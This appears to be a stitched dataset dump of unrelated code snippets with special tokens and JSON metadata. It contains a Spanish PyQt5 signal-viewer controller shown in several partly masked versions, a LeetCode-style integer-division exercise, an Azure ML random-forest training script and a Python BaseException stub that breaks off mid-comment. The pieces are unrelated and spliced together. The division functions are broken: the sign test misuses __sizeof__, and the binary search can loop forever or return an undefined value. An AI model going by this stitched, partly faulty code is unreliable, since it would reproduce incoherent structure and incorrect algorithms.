<|reserved_special_token_0|>
<|reserved_special_token_0|>
def esposible(self):
return self._mi_modelo.possiblesave
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Controlador(object):
def __init__(self, vista, modelo, vista2):
self._mi_vista = vista
self._mi_modelo = modelo
self._mi2_ventana = vista2
def recibirruta(self, r):
self._mi_modelo.recibirruta(r)
def recibirtipodearchivo(self, tipefile):
self._mi_modelo.recibirtipodearchivo(tipefile)
def loadsignals(self, l):
mini, maxi = self._mi_modelo.loadsignals(l)
return mini, maxi
def graph(self, ch, m, mx):
senal = self._mi_modelo.graph(ch, m, mx)
return senal
def filtrar(self, ch, tr, tw, tt):
senal, senalfiltrada = self._mi_modelo.filtrar(ch, tr, tw, tt)
return senal, senalfiltrada
<|reserved_special_token_0|>
def esposible(self):
return self._mi_modelo.possiblesave
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Controlador(object):
def __init__(self, vista, modelo, vista2):
self._mi_vista = vista
self._mi_modelo = modelo
self._mi2_ventana = vista2
def recibirruta(self, r):
self._mi_modelo.recibirruta(r)
def recibirtipodearchivo(self, tipefile):
self._mi_modelo.recibirtipodearchivo(tipefile)
def loadsignals(self, l):
mini, maxi = self._mi_modelo.loadsignals(l)
return mini, maxi
def graph(self, ch, m, mx):
senal = self._mi_modelo.graph(ch, m, mx)
return senal
def filtrar(self, ch, tr, tw, tt):
senal, senalfiltrada = self._mi_modelo.filtrar(ch, tr, tw, tt)
return senal, senalfiltrada
def guardarfil(self, ch, archivo):
self._mi_modelo.guardarfil(ch, archivo)
def esposible(self):
return self._mi_modelo.possiblesave
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Controlador(object):
def __init__(self, vista, modelo, vista2):
self._mi_vista = vista
self._mi_modelo = modelo
self._mi2_ventana = vista2
def recibirruta(self, r):
self._mi_modelo.recibirruta(r)
def recibirtipodearchivo(self, tipefile):
self._mi_modelo.recibirtipodearchivo(tipefile)
def loadsignals(self, l):
mini, maxi = self._mi_modelo.loadsignals(l)
return mini, maxi
def graph(self, ch, m, mx):
senal = self._mi_modelo.graph(ch, m, mx)
return senal
def filtrar(self, ch, tr, tw, tt):
senal, senalfiltrada = self._mi_modelo.filtrar(ch, tr, tw, tt)
return senal, senalfiltrada
def guardarfil(self, ch, archivo):
self._mi_modelo.guardarfil(ch, archivo)
def esposible(self):
return self._mi_modelo.possiblesave
if __name__ == '__main__':
app = QApplication(sys.argv)
mi_vista = Ventanainicio()
mi_modelo = ventanadentrada()
mi_2vista = dosventana()
mi_controlador = Controlador(mi_vista, mi_modelo, mi_2vista)
mi_vista.asignarcontrolador(mi_controlador)
mi_vista.show()
app.exec_()
if mi_modelo.changepage == 1:
mi_2vista.asignarcontrolador(mi_controlador)
mi_2vista.show()
sys.exit(app.exec_())
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 21 09:46:47 2020
@author: Carlos Jose Munoz
"""
# se importa el modelo y vista para que sesten comunicados por medio del controlador
from Modelo import ventanadentrada
from Vista import Ventanainicio,dosventana
import sys
from PyQt5.QtWidgets import QApplication
class Controlador(object): #objeto que va a recibir los comandos de la interfaz para enviarselos al modelo y desarrollar la accion necesaria
def __init__(self, vista,modelo,vista2):
self._mi_vista=vista #atributo para la apertura de la primera ventana
self._mi_modelo= modelo #apertura del modelo
self._mi2_ventana=vista2 #apertura de la segunda ventana
def recibirruta(self, r): #recibe la ruta del archivo y se la pasa al modelo
self._mi_modelo.recibirruta(r)
def recibirtipodearchivo(self, tipefile): #recibe el tipo de archivo para poder hacer el cambio de ventana
self._mi_modelo.recibirtipodearchivo(tipefile)
def loadsignals(self,l):#devuelve los valores iniciales de tiempo segun el tipo de señal
mini, maxi=self._mi_modelo.loadsignals(l)
return mini, maxi
def graph(self,ch,m,mx): #retorna la señal (todos o un solo canal) y los valores de tiempo que se vana graficar
senal= self._mi_modelo.graph(ch,m,mx)
return senal
def filtrar(self,ch,tr,tw,tt): #retorna la señal (canal) original y la señal filtrada que devuelve el modelo dependiendo del tipo del filtro
senal, senalfiltrada= self._mi_modelo.filtrar(ch,tr,tw,tt)
return senal, senalfiltrada
def guardarfil(self,ch,archivo): #recibe la ruta, nombre de archivo y canal para guardar la señal filtrada
self._mi_modelo.guardarfil(ch,archivo)
def esposible(self): #habilita el botón de guardar señal filtrada
return self._mi_modelo.possiblesave
if __name__ == '__main__': #inicio del programa, es el programa principal que se corre
app=QApplication(sys.argv)
mi_vista=Ventanainicio(); #objeto asociado a la ventana inicial
mi_modelo=ventanadentrada();# objeto asociado al modelo
mi_2vista=dosventana(); #objeto asociado a la ventana de visualizacion
mi_controlador= Controlador(mi_vista,mi_modelo,mi_2vista)# objeto que enlaza las ventanas con los modelos
#asignarle el controlador a la vista
mi_vista.asignarcontrolador(mi_controlador) #se usa para realizar el enlace entre la vista y el controlador
mi_vista.show() #genera la ventana inicial
app.exec_();
if (mi_modelo.changepage==1): #si es posible pasar a la segunda ventana se genera la ventana secundaria
mi_2vista.asignarcontrolador(mi_controlador)
mi_2vista.show();
sys.exit(app.exec_());
|
flexible
|
{
"blob_id": "3329db63552592aabb751348efc5d983f2cc3f36",
"index": 1828,
"step-1": "<mask token>\n\n\nclass Controlador(object):\n\n def __init__(self, vista, modelo, vista2):\n self._mi_vista = vista\n self._mi_modelo = modelo\n self._mi2_ventana = vista2\n\n def recibirruta(self, r):\n self._mi_modelo.recibirruta(r)\n\n def recibirtipodearchivo(self, tipefile):\n self._mi_modelo.recibirtipodearchivo(tipefile)\n\n def loadsignals(self, l):\n mini, maxi = self._mi_modelo.loadsignals(l)\n return mini, maxi\n\n def graph(self, ch, m, mx):\n senal = self._mi_modelo.graph(ch, m, mx)\n return senal\n <mask token>\n <mask token>\n\n def esposible(self):\n return self._mi_modelo.possiblesave\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Controlador(object):\n\n def __init__(self, vista, modelo, vista2):\n self._mi_vista = vista\n self._mi_modelo = modelo\n self._mi2_ventana = vista2\n\n def recibirruta(self, r):\n self._mi_modelo.recibirruta(r)\n\n def recibirtipodearchivo(self, tipefile):\n self._mi_modelo.recibirtipodearchivo(tipefile)\n\n def loadsignals(self, l):\n mini, maxi = self._mi_modelo.loadsignals(l)\n return mini, maxi\n\n def graph(self, ch, m, mx):\n senal = self._mi_modelo.graph(ch, m, mx)\n return senal\n\n def filtrar(self, ch, tr, tw, tt):\n senal, senalfiltrada = self._mi_modelo.filtrar(ch, tr, tw, tt)\n return senal, senalfiltrada\n <mask token>\n\n def esposible(self):\n return self._mi_modelo.possiblesave\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Controlador(object):\n\n def __init__(self, vista, modelo, vista2):\n self._mi_vista = vista\n self._mi_modelo = modelo\n self._mi2_ventana = vista2\n\n def recibirruta(self, r):\n self._mi_modelo.recibirruta(r)\n\n def recibirtipodearchivo(self, tipefile):\n self._mi_modelo.recibirtipodearchivo(tipefile)\n\n def loadsignals(self, l):\n mini, maxi = self._mi_modelo.loadsignals(l)\n return mini, maxi\n\n def graph(self, ch, m, mx):\n senal = self._mi_modelo.graph(ch, m, mx)\n return senal\n\n def filtrar(self, ch, tr, tw, tt):\n senal, senalfiltrada = self._mi_modelo.filtrar(ch, tr, tw, tt)\n return senal, senalfiltrada\n\n def guardarfil(self, ch, archivo):\n self._mi_modelo.guardarfil(ch, archivo)\n\n def esposible(self):\n return self._mi_modelo.possiblesave\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Controlador(object):\n\n def __init__(self, vista, modelo, vista2):\n self._mi_vista = vista\n self._mi_modelo = modelo\n self._mi2_ventana = vista2\n\n def recibirruta(self, r):\n self._mi_modelo.recibirruta(r)\n\n def recibirtipodearchivo(self, tipefile):\n self._mi_modelo.recibirtipodearchivo(tipefile)\n\n def loadsignals(self, l):\n mini, maxi = self._mi_modelo.loadsignals(l)\n return mini, maxi\n\n def graph(self, ch, m, mx):\n senal = self._mi_modelo.graph(ch, m, mx)\n return senal\n\n def filtrar(self, ch, tr, tw, tt):\n senal, senalfiltrada = self._mi_modelo.filtrar(ch, tr, tw, tt)\n return senal, senalfiltrada\n\n def guardarfil(self, ch, archivo):\n self._mi_modelo.guardarfil(ch, archivo)\n\n def esposible(self):\n return self._mi_modelo.possiblesave\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n mi_vista = Ventanainicio()\n mi_modelo = ventanadentrada()\n mi_2vista = dosventana()\n mi_controlador = Controlador(mi_vista, mi_modelo, mi_2vista)\n mi_vista.asignarcontrolador(mi_controlador)\n mi_vista.show()\n app.exec_()\n if mi_modelo.changepage == 1:\n mi_2vista.asignarcontrolador(mi_controlador)\n mi_2vista.show()\n sys.exit(app.exec_())\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 21 09:46:47 2020\n\n@author: Carlos Jose Munoz\n\"\"\"\n# se importa el modelo y vista para que sesten comunicados por medio del controlador \nfrom Modelo import ventanadentrada\nfrom Vista import Ventanainicio,dosventana\n\nimport sys\n\nfrom PyQt5.QtWidgets import QApplication \n\nclass Controlador(object): #objeto que va a recibir los comandos de la interfaz para enviarselos al modelo y desarrollar la accion necesaria \n def __init__(self, vista,modelo,vista2): \n self._mi_vista=vista #atributo para la apertura de la primera ventana \n self._mi_modelo= modelo #apertura del modelo \n self._mi2_ventana=vista2 #apertura de la segunda ventana \n \n def recibirruta(self, r): #recibe la ruta del archivo y se la pasa al modelo \n self._mi_modelo.recibirruta(r)\n \n def recibirtipodearchivo(self, tipefile): #recibe el tipo de archivo para poder hacer el cambio de ventana\n self._mi_modelo.recibirtipodearchivo(tipefile)\n \n \n def loadsignals(self,l):#devuelve los valores iniciales de tiempo segun el tipo de señal \n mini, maxi=self._mi_modelo.loadsignals(l)\n return mini, maxi\n \n def graph(self,ch,m,mx): #retorna la señal (todos o un solo canal) y los valores de tiempo que se vana graficar \n senal= self._mi_modelo.graph(ch,m,mx)\n return senal\n \n def filtrar(self,ch,tr,tw,tt): #retorna la señal (canal) original y la señal filtrada que devuelve el modelo dependiendo del tipo del filtro \n senal, senalfiltrada= self._mi_modelo.filtrar(ch,tr,tw,tt)\n return senal, senalfiltrada\n \n def guardarfil(self,ch,archivo): #recibe la ruta, nombre de archivo y canal para guardar la señal filtrada \n self._mi_modelo.guardarfil(ch,archivo)\n \n def esposible(self): #habilita el botón de guardar señal filtrada \n return self._mi_modelo.possiblesave\n \nif __name__ == '__main__': #inicio del programa, es el programa principal que se corre \n app=QApplication(sys.argv)\n mi_vista=Ventanainicio(); #objeto asociado a la ventana inicial \n mi_modelo=ventanadentrada();# objeto asociado al modelo \n mi_2vista=dosventana(); #objeto asociado a la ventana de visualizacion \n mi_controlador= Controlador(mi_vista,mi_modelo,mi_2vista)# objeto que enlaza las ventanas con los modelos \n \n #asignarle el controlador a la vista\n mi_vista.asignarcontrolador(mi_controlador) #se usa para realizar el enlace entre la vista y el controlador \n \n mi_vista.show() #genera la ventana inicial \n \n \n app.exec_();\n if (mi_modelo.changepage==1): #si es posible pasar a la segunda ventana se genera la ventana secundaria \n \n mi_2vista.asignarcontrolador(mi_controlador)\n \n mi_2vista.show();\n sys.exit(app.exec_());\n\n\n \n",
"step-ids": [
7,
8,
9,
10,
12
]
}
|
[
7,
8,
9,
10,
12
] |
'''
给定两个整数,被除数 dividend 和除数 divisor。将两数相除,要求不使用乘法、除法和 mod 运算符。
返回被除数 dividend 除以除数 divisor 得到的商
链接:https://leetcode-cn.com/problems/divide-two-integers
'''
# 该题看起来也不难,但是其中坑很多,想要写出健壮的代码并不容易
# 我个人思考可以考虑使用上下界,不断缩小范围来确定
def division(dividend, divisor):
temp = 0
for i in range(dividend + 1):
temp += abs(divisor)
if temp > abs(dividend):
if ((dividend ^ divisor) >> divisor.__sizeof__())^1 > 0:
return i
else :
return -i
return 2**31 - 1
def division_v2(dividend, divisor):
def get_add_num(num, times):
sum = 0
for i in range(times):
sum += num
return sum
low = 0
up = dividend
while low < up:
mid = round((low + up) / 2)
if get_add_num(divisor, mid) < dividend:
low = mid
else:
up = mid
return mid
if __name__ == '__main__':
# print(division(2147483647, 1))
print(division_v2(3, 1))
|
normal
|
{
"blob_id": "edb80652de641a1a6cbb37a60cc236cd7828a96e",
"index": 8151,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef division_v2(dividend, divisor):\n\n def get_add_num(num, times):\n sum = 0\n for i in range(times):\n sum += num\n return sum\n low = 0\n up = dividend\n while low < up:\n mid = round((low + up) / 2)\n if get_add_num(divisor, mid) < dividend:\n low = mid\n else:\n up = mid\n return mid\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef division(dividend, divisor):\n temp = 0\n for i in range(dividend + 1):\n temp += abs(divisor)\n if temp > abs(dividend):\n if (dividend ^ divisor) >> divisor.__sizeof__() ^ 1 > 0:\n return i\n else:\n return -i\n return 2 ** 31 - 1\n\n\ndef division_v2(dividend, divisor):\n\n def get_add_num(num, times):\n sum = 0\n for i in range(times):\n sum += num\n return sum\n low = 0\n up = dividend\n while low < up:\n mid = round((low + up) / 2)\n if get_add_num(divisor, mid) < dividend:\n low = mid\n else:\n up = mid\n return mid\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef division(dividend, divisor):\n temp = 0\n for i in range(dividend + 1):\n temp += abs(divisor)\n if temp > abs(dividend):\n if (dividend ^ divisor) >> divisor.__sizeof__() ^ 1 > 0:\n return i\n else:\n return -i\n return 2 ** 31 - 1\n\n\ndef division_v2(dividend, divisor):\n\n def get_add_num(num, times):\n sum = 0\n for i in range(times):\n sum += num\n return sum\n low = 0\n up = dividend\n while low < up:\n mid = round((low + up) / 2)\n if get_add_num(divisor, mid) < dividend:\n low = mid\n else:\n up = mid\n return mid\n\n\nif __name__ == '__main__':\n print(division_v2(3, 1))\n",
"step-5": "\n'''\n给定两个整数,被除数 dividend 和除数 divisor。将两数相除,要求不使用乘法、除法和 mod 运算符。\n\n返回被除数 dividend 除以除数 divisor 得到的商\n\n链接:https://leetcode-cn.com/problems/divide-two-integers\n'''\n\n# 该题看起来也不难,但是其中坑很多,想要写出健壮的代码并不容易\n# 我个人思考可以考虑使用上下界,不断缩小范围来确定\ndef division(dividend, divisor):\n temp = 0\n for i in range(dividend + 1):\n temp += abs(divisor)\n if temp > abs(dividend):\n if ((dividend ^ divisor) >> divisor.__sizeof__())^1 > 0:\n return i\n else :\n return -i\n return 2**31 - 1\n\n\ndef division_v2(dividend, divisor):\n def get_add_num(num, times):\n sum = 0\n for i in range(times):\n sum += num\n return sum\n low = 0\n up = dividend\n while low < up:\n mid = round((low + up) / 2)\n if get_add_num(divisor, mid) < dividend:\n low = mid\n else:\n up = mid\n return mid\n\n\nif __name__ == '__main__':\n # print(division(2147483647, 1))\n print(division_v2(3, 1))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
parser.add_argument('--in_n_estimator', type=int, default=8)
parser.add_argument('--in_criterion', type=str, default='gini')
parser.add_argument('--in_max_depth', type=int, default=2)
<|reserved_special_token_0|>
model.fit(x_train, y_train)
<|reserved_special_token_0|>
run.log('Accuracy', float(accuracy))
os.makedirs('outputs', exist_ok=True)
joblib.dump(model, 'outputs/model_forest.joblib')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
run = Run.get_context()
parser = argparse.ArgumentParser()
parser.add_argument('--in_n_estimator', type=int, default=8)
parser.add_argument('--in_criterion', type=str, default='gini')
parser.add_argument('--in_max_depth', type=int, default=2)
args = parser.parse_args()
in_n_estimators = args.in_n_estimator
in_criterion = args.in_criterion
in_max_depth = args.in_max_depth
df = pd.read_csv('prepared_data.csv')
columns = df.iloc[1:2, :-1].columns
x = df[columns]
y = df.iloc[:, -1:]
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25,
random_state=2)
model = RandomForestClassifier(n_estimators=in_n_estimators, criterion=
in_criterion, max_depth=in_max_depth)
model.fit(x_train, y_train)
accuracy = model.score(x_test, y_test)
run.log('Accuracy', float(accuracy))
os.makedirs('outputs', exist_ok=True)
joblib.dump(model, 'outputs/model_forest.joblib')
<|reserved_special_token_1|>
from sklearn.model_selection import train_test_split
from azureml.core import Run
from sklearn.ensemble import RandomForestClassifier
import pandas as pd
import argparse
import os
import joblib
import numpy as np
run = Run.get_context()
parser = argparse.ArgumentParser()
parser.add_argument('--in_n_estimator', type=int, default=8)
parser.add_argument('--in_criterion', type=str, default='gini')
parser.add_argument('--in_max_depth', type=int, default=2)
args = parser.parse_args()
in_n_estimators = args.in_n_estimator
in_criterion = args.in_criterion
in_max_depth = args.in_max_depth
df = pd.read_csv('prepared_data.csv')
columns = df.iloc[1:2, :-1].columns
x = df[columns]
y = df.iloc[:, -1:]
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25,
random_state=2)
model = RandomForestClassifier(n_estimators=in_n_estimators, criterion=
in_criterion, max_depth=in_max_depth)
model.fit(x_train, y_train)
accuracy = model.score(x_test, y_test)
run.log('Accuracy', float(accuracy))
os.makedirs('outputs', exist_ok=True)
joblib.dump(model, 'outputs/model_forest.joblib')
<|reserved_special_token_1|>
from sklearn.model_selection import train_test_split
from azureml.core import Run
from sklearn.ensemble import RandomForestClassifier
import pandas as pd
import argparse
import os
import joblib
import numpy as np
# Get the experiment run context
run = Run.get_context()
# Get arguments
parser = argparse.ArgumentParser()
parser.add_argument('--in_n_estimator', type=int, default=8)
parser.add_argument('--in_criterion', type=str, default="gini")
parser.add_argument('--in_max_depth', type=int, default=2)
args = parser.parse_args()
in_n_estimators = args.in_n_estimator
in_criterion = args.in_criterion
in_max_depth = args.in_max_depth
# read prepared data
df = pd.read_csv("prepared_data.csv")
columns = df.iloc[1:2, :-1].columns
x = df[columns]
y = df.iloc[:, -1:]
# split data into train and test
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25, random_state=2)
# “gini”, “entropy”
model = RandomForestClassifier(n_estimators=in_n_estimators, criterion=in_criterion, max_depth=in_max_depth)
model.fit(x_train, y_train)
accuracy = model.score(x_test, y_test)
run.log("Accuracy", float(accuracy))
os.makedirs('outputs', exist_ok=True)
joblib.dump(model, 'outputs/model_forest.joblib')
|
flexible
|
{
"blob_id": "66c2d73c100f7fc802e66f2762c92664e4b93fcd",
"index": 5736,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nparser.add_argument('--in_n_estimator', type=int, default=8)\nparser.add_argument('--in_criterion', type=str, default='gini')\nparser.add_argument('--in_max_depth', type=int, default=2)\n<mask token>\nmodel.fit(x_train, y_train)\n<mask token>\nrun.log('Accuracy', float(accuracy))\nos.makedirs('outputs', exist_ok=True)\njoblib.dump(model, 'outputs/model_forest.joblib')\n",
"step-3": "<mask token>\nrun = Run.get_context()\nparser = argparse.ArgumentParser()\nparser.add_argument('--in_n_estimator', type=int, default=8)\nparser.add_argument('--in_criterion', type=str, default='gini')\nparser.add_argument('--in_max_depth', type=int, default=2)\nargs = parser.parse_args()\nin_n_estimators = args.in_n_estimator\nin_criterion = args.in_criterion\nin_max_depth = args.in_max_depth\ndf = pd.read_csv('prepared_data.csv')\ncolumns = df.iloc[1:2, :-1].columns\nx = df[columns]\ny = df.iloc[:, -1:]\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25,\n random_state=2)\nmodel = RandomForestClassifier(n_estimators=in_n_estimators, criterion=\n in_criterion, max_depth=in_max_depth)\nmodel.fit(x_train, y_train)\naccuracy = model.score(x_test, y_test)\nrun.log('Accuracy', float(accuracy))\nos.makedirs('outputs', exist_ok=True)\njoblib.dump(model, 'outputs/model_forest.joblib')\n",
"step-4": "from sklearn.model_selection import train_test_split\nfrom azureml.core import Run\nfrom sklearn.ensemble import RandomForestClassifier\nimport pandas as pd\nimport argparse\nimport os\nimport joblib\nimport numpy as np\nrun = Run.get_context()\nparser = argparse.ArgumentParser()\nparser.add_argument('--in_n_estimator', type=int, default=8)\nparser.add_argument('--in_criterion', type=str, default='gini')\nparser.add_argument('--in_max_depth', type=int, default=2)\nargs = parser.parse_args()\nin_n_estimators = args.in_n_estimator\nin_criterion = args.in_criterion\nin_max_depth = args.in_max_depth\ndf = pd.read_csv('prepared_data.csv')\ncolumns = df.iloc[1:2, :-1].columns\nx = df[columns]\ny = df.iloc[:, -1:]\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25,\n random_state=2)\nmodel = RandomForestClassifier(n_estimators=in_n_estimators, criterion=\n in_criterion, max_depth=in_max_depth)\nmodel.fit(x_train, y_train)\naccuracy = model.score(x_test, y_test)\nrun.log('Accuracy', float(accuracy))\nos.makedirs('outputs', exist_ok=True)\njoblib.dump(model, 'outputs/model_forest.joblib')\n",
"step-5": "from sklearn.model_selection import train_test_split\nfrom azureml.core import Run\nfrom sklearn.ensemble import RandomForestClassifier\nimport pandas as pd\nimport argparse\nimport os\nimport joblib\nimport numpy as np\n\n\n# Get the experiment run context\nrun = Run.get_context()\n\n# Get arguments\nparser = argparse.ArgumentParser()\nparser.add_argument('--in_n_estimator', type=int, default=8)\nparser.add_argument('--in_criterion', type=str, default=\"gini\")\nparser.add_argument('--in_max_depth', type=int, default=2)\n\nargs = parser.parse_args()\nin_n_estimators = args.in_n_estimator\nin_criterion = args.in_criterion\nin_max_depth = args.in_max_depth\n\n\n# read prepared data\ndf = pd.read_csv(\"prepared_data.csv\")\ncolumns = df.iloc[1:2, :-1].columns\nx = df[columns]\ny = df.iloc[:, -1:]\n\n# split data into train and test\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25, random_state=2)\n\n# “gini”, “entropy”\nmodel = RandomForestClassifier(n_estimators=in_n_estimators, criterion=in_criterion, max_depth=in_max_depth)\n\nmodel.fit(x_train, y_train)\n\naccuracy = model.score(x_test, y_test)\nrun.log(\"Accuracy\", float(accuracy))\n\nos.makedirs('outputs', exist_ok=True)\njoblib.dump(model, 'outputs/model_forest.joblib')\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
class BaseException(object):
<|reserved_special_token_0|>
def with_traceback(self, tb):
"""
Exception.with_traceback(tb) --
set self.__traceback__ to tb and return self.
"""
pass
def __delattr__(self, *args, **kwargs):
""" Implement delattr(self, name). """
pass
def __getattribute__(self, *args, **kwargs):
""" Return getattr(self, name). """
pass
def __init__(self, *args, **kwargs):
pass
@staticmethod
def __new__(*args, **kwargs):
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __reduce__(self, *args, **kwargs):
pass
<|reserved_special_token_0|>
def __setattr__(self, *args, **kwargs):
""" Implement setattr(self, name, value). """
pass
<|reserved_special_token_0|>
def __str__(self, *args, **kwargs):
""" Return str(self). """
pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class BaseException(object):
<|reserved_special_token_0|>
def with_traceback(self, tb):
"""
Exception.with_traceback(tb) --
set self.__traceback__ to tb and return self.
"""
pass
def __delattr__(self, *args, **kwargs):
""" Implement delattr(self, name). """
pass
def __getattribute__(self, *args, **kwargs):
""" Return getattr(self, name). """
pass
def __init__(self, *args, **kwargs):
pass
@staticmethod
def __new__(*args, **kwargs):
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __reduce__(self, *args, **kwargs):
pass
<|reserved_special_token_0|>
def __setattr__(self, *args, **kwargs):
""" Implement setattr(self, name, value). """
pass
def __setstate__(self, *args, **kwargs):
pass
def __str__(self, *args, **kwargs):
""" Return str(self). """
pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class BaseException(object):
<|reserved_special_token_0|>
def with_traceback(self, tb):
"""
Exception.with_traceback(tb) --
set self.__traceback__ to tb and return self.
"""
pass
def __delattr__(self, *args, **kwargs):
""" Implement delattr(self, name). """
pass
def __getattribute__(self, *args, **kwargs):
""" Return getattr(self, name). """
pass
def __init__(self, *args, **kwargs):
pass
@staticmethod
def __new__(*args, **kwargs):
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __reduce__(self, *args, **kwargs):
pass
def __repr__(self, *args, **kwargs):
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs):
""" Implement setattr(self, name, value). """
pass
def __setstate__(self, *args, **kwargs):
pass
def __str__(self, *args, **kwargs):
""" Return str(self). """
pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class BaseException(object):
<|reserved_special_token_0|>
def with_traceback(self, tb):
"""
Exception.with_traceback(tb) --
set self.__traceback__ to tb and return self.
"""
pass
def __delattr__(self, *args, **kwargs):
""" Implement delattr(self, name). """
pass
def __getattribute__(self, *args, **kwargs):
""" Return getattr(self, name). """
pass
def __init__(self, *args, **kwargs):
pass
@staticmethod
def __new__(*args, **kwargs):
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __reduce__(self, *args, **kwargs):
pass
def __repr__(self, *args, **kwargs):
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs):
""" Implement setattr(self, name, value). """
pass
def __setstate__(self, *args, **kwargs):
pass
def __str__(self, *args, **kwargs):
""" Return str(self). """
pass
args = property(lambda self: object(), lambda self, v: None, lambda
self: None)
__cause__ = property(lambda self: object(), lambda self, v: None, lambda
self: None)
<|reserved_special_token_0|>
__context__ = property(lambda self: object(), lambda self, v: None, lambda
self: None)
<|reserved_special_token_0|>
__suppress_context__ = property(lambda self: object(), lambda self, v:
None, lambda self: None)
__traceback__ = property(lambda self: object(), lambda self, v: None,
lambda self: None)
__dict__ = None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
# -*- encoding: utf-8 -*-
class BaseException(object):
""" Common base class for all exceptions """
def with_traceback(self, tb): # real signature unknown; restored from __doc__
"""
Exception.with_traceback(tb) --
set self.__traceback__ to tb and return self.
"""
pass
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __setstate__(self, *args, **kwargs): # real signature unknown
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
args = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__cause__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""exception cause"""
__context__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""exception context"""
__suppress_context__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__traceback__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__dict__ = None # (!) real value is "mappingproxy({'__repr__': <slot wrapper '__repr__' of 'BaseException' objects>, '__str__': <slot wrapper '__str__' of 'BaseException' objects>, '__getattribute__': <slot wrapper '__getattribute__' of 'BaseException' objects>, '__setattr__': <slot wrapper '__setattr__' of 'BaseException' objects>, '__delattr__': <slot wrapper '__delattr__' of 'BaseException' objects>, '__init__': <slot wrapper '__init__' of 'BaseException' objects>, '__new__': <built-in method __new__ of type object at 0x00007FFC49400810>, '__reduce__': <method '__reduce__' of 'BaseException' objects>, '__setstate__': <method '__setstate__' of 'BaseException' objects>, 'with_traceback': <method 'with_traceback' of 'BaseException' objects>, '__suppress_context__': <member '__suppress_context__' of 'BaseException' objects>, '__dict__': <attribute '__dict__' of 'BaseException' objects>, 'args': <attribute 'args' of 'BaseException' objects>, '__traceback__': <attribute '__traceback__' of 'BaseException' objects>, '__context__': <attribute '__context__' of 'BaseException' objects>, '__cause__': <attribute '__cause__' of 'BaseException' objects>, '__doc__': 'Common base class for all exceptions'})"
# __context__ :当在except子异常或finally子异常中引发(或重新引发)异常时,(既有多个try)
# __context__ 被自动设置为捕获的最后一个异常;如果没有处理新的异常,最终显示的回溯将包括最初的异常和最终的异常
# try:
# try:
# raise ValueError("ValueError")
# except ValueError as first:
# raise TypeError("TypeError") from first
# except TypeError as second:
# print("The exception was", repr(second))
# print("Its __context__ was", repr(second.__context__))
# print("Its __cause__ was", repr(second.__cause__))
#
# The exception was TypeError('TypeError')
# Its __context__ was ValueError('ValueError')
# Its __cause__ was ValueError('ValueError')
## 必须要有raise from
## context 为raise from 的 excepton
# try:
# try:
# raise AttributeError("1")
# except Exception as e1:
# raise AttributeError from e1
# except AttributeError as exc_1:
# print("context::",repr(exc_1.__context__))
# print("cause::",repr(exc_1.__cause__))
# AttributeError 是raise from e1 即context,cause为 e1
# print("context::",repr(exc_1.__context__))
# print("cause::",repr(exc_1.__cause__))
# try:
# try:
# try:
# raise AttributeError("1")
# except Exception as e1:
# raise AttributeError("2") from e1
# except AttributeError as e2:
